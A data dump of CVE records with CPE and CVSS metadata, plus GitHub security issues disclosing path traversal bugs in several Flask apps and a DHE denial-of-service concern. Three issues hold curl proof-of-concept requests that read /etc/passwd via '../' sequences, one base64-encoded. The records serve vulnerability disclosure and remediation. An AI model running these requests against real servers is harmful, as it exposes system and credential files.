"vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "F62D754D-A4A1-4093-AB42-9F51C19976CA", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*", "matchCriteriaId": "90084CD6-FA4B-4305-BC65-58237BAF714E", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "BC9D4626-915F-42E5-81E0-6F8271084773", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "7056F1FA-24AC-4D9F-8DDC-B3CA4740BF5E", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_service_proxy:1.6.0:*:*:*:*:kubernetes:*:*", "matchCriteriaId": "BC5AC8C7-92BA-48D4-81A1-F5323DA952A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:*", "matchCriteriaId": "E48AC50D-19B3-4E97-ADD2-B661BD891ED7", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*", "matchCriteriaId": "B13C4244-BE15-4F2C-BBBA-35072571B041", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-ip_websafe:*:*:*:*:*:*:*:*", "matchCriteriaId": "C1B4FBF6-C23A-4BD2-ADFB-9617C03B603A", "versionEndExcluding": null, "versionEndIncluding": "17.1.0", "versionStartExcluding": null, "versionStartIncluding": "13.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-iq_centralized_management:*:*:*:*:*:*:*:*", "matchCriteriaId": "360D8842-2C55-450F-9AFA-09CA34B12598", "versionEndExcluding": null, "versionEndIncluding": "8.2.0", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:big-iq_centralized_management:7.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA0B396A-B5CE-4337-A33A-EF58C4589CB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:f5os-a:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "C4A3C86A-CA2F-4AC8-A43E-765829A96147", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:f5os-a:1.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "03E01235-F9B0-4CCF-AA08-FECF61C62B21", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:f5os-c:*:*:*:*:*:*:*:*", "matchCriteriaId": "3BFAE8EC-9A5F-421D-990D-B6D454DECAEC", "versionEndExcluding": null, "versionEndIncluding": "1.3.2", "versionStartExcluding": null, "versionStartIncluding": "1.3.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:f5os-c:1.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC3EDB8D-5C16-49DF-BE48-C83744AD7788", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:f5os-c:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "12FEEABD-9A4A-4A33-9B74-7B053352C47D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:traffix_signaling_delivery_controller:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "42836A1C-81BB-4F80-9E32-EEE0DAA18D26", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:f5:traffix_signaling_delivery_controller:5.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA4D5EC6-8099-4D0A-AD6F-BA3B37C2EBD8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "matchCriteriaId": "3B3AD582-9909-4FF5-B541-571F18E22356", "versionEndExcluding": "10.06.0180", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "10.06.0000", "vulnerable": true }, { "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "matchCriteriaId": "21F81EB2-3916-4DC6-9600-B7FD17906B53", "versionEndExcluding": "10.07.0030", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "10.07.0000", "vulnerable": true }, { "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "matchCriteriaId": "71284AA8-9E0E-4B2F-8464-B49E1D6965B5", "versionEndExcluding": "10.08.0010", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "10.08.0000", "vulnerable": true }, { "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "matchCriteriaId": "F059E5A9-E613-4BE1-BF61-C477B3441175", "versionEndExcluding": "10.09.0002", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "10.09.0000", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:hpe:aruba_cx_4100i:-:*:*:*:*:*:*:*", "matchCriteriaId": "B7C2B56C-203F-4290-BCE7-8BD751DF9CEF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_6100:-:*:*:*:*:*:*:*", "matchCriteriaId": "FF1DD310-3D31-4204-92E0-70C33EE44F08", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_6200f:-:*:*:*:*:*:*:*", "matchCriteriaId": "FCD1A83B-109B-4596-AE37-706751E2B57D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_6200m:-:*:*:*:*:*:*:*", "matchCriteriaId": "1218AAA5-01ED-4D89-A7AE-A600356ABD46", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_6300f:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D6F748F-89E9-45FB-8BE7-2201E5EB2755", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_6300m:-:*:*:*:*:*:*:*", "matchCriteriaId": "8066A871-2683-4F74-9750-E73BF004209F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_6405:-:*:*:*:*:*:*:*", "matchCriteriaId": "D118A9A6-BBA4-4149-AE0D-1DA2EB45B53F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_6410:-:*:*:*:*:*:*:*", "matchCriteriaId": "790C5E7A-3405-4873-83E8-4D9C0FEC5E6D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_8320:-:*:*:*:*:*:*:*", "matchCriteriaId": "10B5F18A-28B0-49B4-8374-C681C2B48D2A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_8325-32c:-:*:*:*:*:*:*:*", "matchCriteriaId": "59B7E2D3-0B72-4A78-AEFA-F106FAD38156", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_8325-48y8c:-:*:*:*:*:*:*:*", "matchCriteriaId": "7E87A92B-4EE5-4235-A0DA-195F27841DBB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_8360-12c:-:*:*:*:*:*:*:*", "matchCriteriaId": "6BC24E52-13C0-402F-9ABF-A1DE51719AEF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_8360-16y2c:-:*:*:*:*:*:*:*", "matchCriteriaId": "76EF979E-061A-42A3-B161-B835E92ED180", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_8360-24xf2c:-:*:*:*:*:*:*:*", "matchCriteriaId": "DE04919C-9289-4FB3-938F-F8BB15EC6A74", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_8360-32y4c:-:*:*:*:*:*:*:*", "matchCriteriaId": "B630C64B-C474-477D-A80B-A0FB73ACCC49", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_8360-48xt4c:-:*:*:*:*:*:*:*", "matchCriteriaId": "53ABE8B8-A4F6-400B-A893-314BE24D06B8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_8360-48y6c:-:*:*:*:*:*:*:*", "matchCriteriaId": "C44383CC-3751-455E-B1AB-39B16F40DC76", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:h:hpe:aruba_cx_8400:-:*:*:*:*:*:*:*", "matchCriteriaId": "B25A9CD2-5E5F-4BDB-8707-5D6941411A2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stormshield:stormshield_management_center:*:*:*:*:*:*:*:*", "matchCriteriaId": "62A933C5-C56E-485C-AD49-3B6A2C329131", "versionEndExcluding": "3.3.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:stormshield:stormshield_network_security:*:*:*:*:*:*:*:*", "matchCriteriaId": "F7387F52-013D-432D-87D8-5D3ABD472C9E", "versionEndExcluding": "4.3.16", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:stormshield:stormshield_network_security:*:*:*:*:*:*:*:*", "matchCriteriaId": "C8A23A5D-928A-4225-9C93-31E5DFE215A7", "versionEndExcluding": "4.6.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/mozilla/ssl-config-generator/issues/162
[ "Issue Tracking" ]
github.com
[ "mozilla", "ssl-config-generator" ]
[These guys](https://github.com/Balasys/dheater) found a way to saturate the server CPU core to 100% using as little as 5 KB/s of incoming traffic. The pre-requisite is that the server supports DHE as the key exchange. Therefore, to avoid creating such a vulnerable configuration, I propose removing DHE from all levels of SSL config.
Stop recommending DHE, because of "dheater" vulnerability
https://api.github.com/repos/mozilla/server-side-tls/issues/299/comments
42
2021-10-23T22:32:53Z
2025-01-27T06:18:13Z
https://github.com/mozilla/server-side-tls/issues/299
2,812,170,926
299
2,782
CVE-2021-43494
2021-11-12T14:15:07.403
OpenCV-REST-API master branch as of commit 69be158c05d4dd5a4aff38fdc680a162dd6b9e49 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codingforentrepreneurs:opencv_rest_api:2020-01-24:*:*:*:*:*:*:*", "matchCriteriaId": "B07D4A89-ED66-40DE-8C64-EB5F42E87854", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "codingforentrepreneurs", "OpenCV-REST-API" ]
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system). This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. ## Root Cause Analysis In this case, the path traversal vulnerability can be blamed on incorrect usage of the send_from_directory Flask call. The vulnerability occurs due to the code snippet shown below https://github.com/codingforentrepreneurs/OpenCV-REST-API/blob/69be158c05d4dd5a4aff38fdc680a162dd6b9e49/api/cv/views.py#L7-L15 Here, since the `path` parameter is attacker controlled, the effective directory and filename passed to the send_from_directory call can be controlled by the attacker leading to a path traversal attack. This can be exploited by accessing a URI like `/static/outputs/../../../../etc/passwd` which will return the contents of the `/etc/passwd` file. ## Remediation This can be easily fixed my restricting the value of file and path parameters by a fixed whitelist of possible values. ## CVSS 3 Score CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H ### This bug was found using *[CodeQL by Github](codeql.github.com/)*
[Security] Path Traversal Vulnerability found
https://api.github.com/repos/codingforentrepreneurs/OpenCV-REST-API/issues/2/comments
2
2021-09-22T22:50:48Z
2024-01-16T09:03:29Z
https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2
1,004,840,798
2
2,783
CVE-2021-43496
2021-11-12T14:15:07.447
Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/varun-suresh/Clustering/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/varun-suresh/Clustering/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:*", "matchCriteriaId": "FD04F65D-025E-4150-A910-B0C38C5E2F51", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/varun-suresh/Clustering/issues/12
[ "Exploit", "Third Party Advisory" ]
github.com
[ "varun-suresh", "Clustering" ]
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system). This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. ## Root Cause Analysis In this case, the path traversal vulnerability can be blamed on incorrect usage of the send_from_directory Flask call. The vulnerability occurs due to the code snippet shown below https://github.com/varun-suresh/Clustering/blob/53e663e259bcfc8cdecb56c0bb255bd70bfcaa70/visualize.py#L33-L36 Here, since the `fpath` parameter is attacker controlled, the effective directory and filename passed to the send_from_directory call can be controlled by the attacker leading to a path traversal attack. ## Proof of Concept The bug can be verified using the proof of concept similar to the one shown below. ``` curl -i --path-as-is -s -k -X $'GET' \ -H $'Host: 0.0.0.0:5000' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ $'http://0.0.0.0:5000/img/../../../../../../etc/passwd' ``` ## Remediation This can be easily fixed my restricting the value of file and path parameters by a fixed whitelist of possible values. ## CVSS 3 Score CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H ### This bug was found using *[CodeQL by Github](codeql.github.com/)*
[Security] Path Traversal Vulnerability found
https://api.github.com/repos/varun-suresh/Clustering/issues/12/comments
1
2021-09-22T22:24:23Z
2022-04-23T22:45:11Z
https://github.com/varun-suresh/Clustering/issues/12
1,004,827,518
12
2,784
CVE-2021-43492
2021-11-12T15:15:10.997
AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system andcan significantly aid in getting remote code access.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/AlquistManager/alquist/issues/42" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/AlquistManager/alquist/issues/42" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:*", "matchCriteriaId": "022CFA01-411F-40C5-80A2-7FED3557C578", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/AlquistManager/alquist/issues/42
[ "Exploit", "Third Party Advisory" ]
github.com
[ "AlquistManager", "alquist" ]
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system). This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. ## Root Cause Analysis In the case of Alquist, the path traversal vulnerability can be blamed on incorrect usage of the `send_from_directory` Flask call. The vulnerability occurs due to the code snippet shown below https://github.com/AlquistManager/alquist/blob/280d99f43b11378212652e75f6f3159cde9c1d36/IO/input.py#L69-L72 Here, since the `path` and `file` parameters are attacker controlled, the effective directory and filename passed to the `send_from_directory` call can be controlled by the attacker leading to a path traversal attack. ## Proof of Concept The bug can be verified using the proof of concept similar to the one shown below. ``` curl -i --path-as-is -s -k -X $'GET' \ -H $'Host: 0.0.0.0:5000' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ $'http://0.0.0.0:5000/client/../../../../../etc/../../../etc/passwd' ``` ## Remediation This can be easily fixed my restricting the value of `file` and `path` parameters by a fixed whitelist of possible values. This bug was found using *[CodeQL by Github](codeql.github.com/)*
[Security] : Path Traversal in the IO module
https://api.github.com/repos/AlquistManager/alquist/issues/42/comments
1
2021-09-22T20:04:48Z
2022-04-23T22:45:03Z
https://github.com/AlquistManager/alquist/issues/42
1,004,725,779
42
2,785
CVE-2021-43493
2021-11-12T15:15:11.040
ServerManagement master branch as of commit 49491cc6f94980e6be7791d17be947c27071eb56 is affected by a directory traversal vulnerability. This vulnerability can be used to extract credentials which can in turn be used to execute code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cksgf/ServerManagement/issues/21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cksgf/ServerManagement/issues/21" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:servermanagement_project:servermanagement:2019-11-13:*:*:*:*:*:*:*", "matchCriteriaId": "8A70C1D8-B86F-409F-B680-CF02D7EB239D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/cksgf/ServerManagement/issues/21
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cksgf", "ServerManagement" ]
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system). This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. ## Root Cause Analysis In this case, the path traversal vulnerability can be blamed on incorrect usage of the send_from_directory Flask call. The vulnerability occurs due to the code snippet shown below https://github.com/cksgf/ServerManagement/blob/49491cc6f94980e6be7791d17be947c27071eb56/route/file.py#L82-L93 Here, since the `filename` parameter is attacker controlled, the effective directory and filename passed to the send_from_directory call can be controlled by the attacker leading to a path traversal attack. ## Proof of Concept The bug can be verified using the proof of concept similar to the one shown below. ``` curl -i -s -k -X $'GET' \ -H $'Host: 0.0.0.0:9001' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ -b $'session=eyJwYXNzd29yZCI6IndlbnJ1aSIsInNlY2VjdExpc3QiOiJbXSIsInVzZXJuYW1lIjoiYWRtaW4ifQ.FC1IVA.B3HWw42zgF_CltmVq0wm0N64vYQ' \ $'http://0.0.0.0:9001/DownFile?filename=L2V0Yy9wYXNzd2Q=' ``` ## Remediation This can be easily fixed my restricting the value of file and path parameters by a fixed whitelist of possible values. ## CVSS 3 Score CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H ### This bug was found using *[CodeQL by Github](codeql.github.com/)*
[Security] Path Traversal Vulnerability found
https://api.github.com/repos/cksgf/ServerManagement/issues/21/comments
1
2021-09-22T23:11:43Z
2022-04-23T22:46:06Z
https://github.com/cksgf/ServerManagement/issues/21
1,004,852,086
21
2,786
CVE-2021-43616
2021-11-13T18:15:07.537
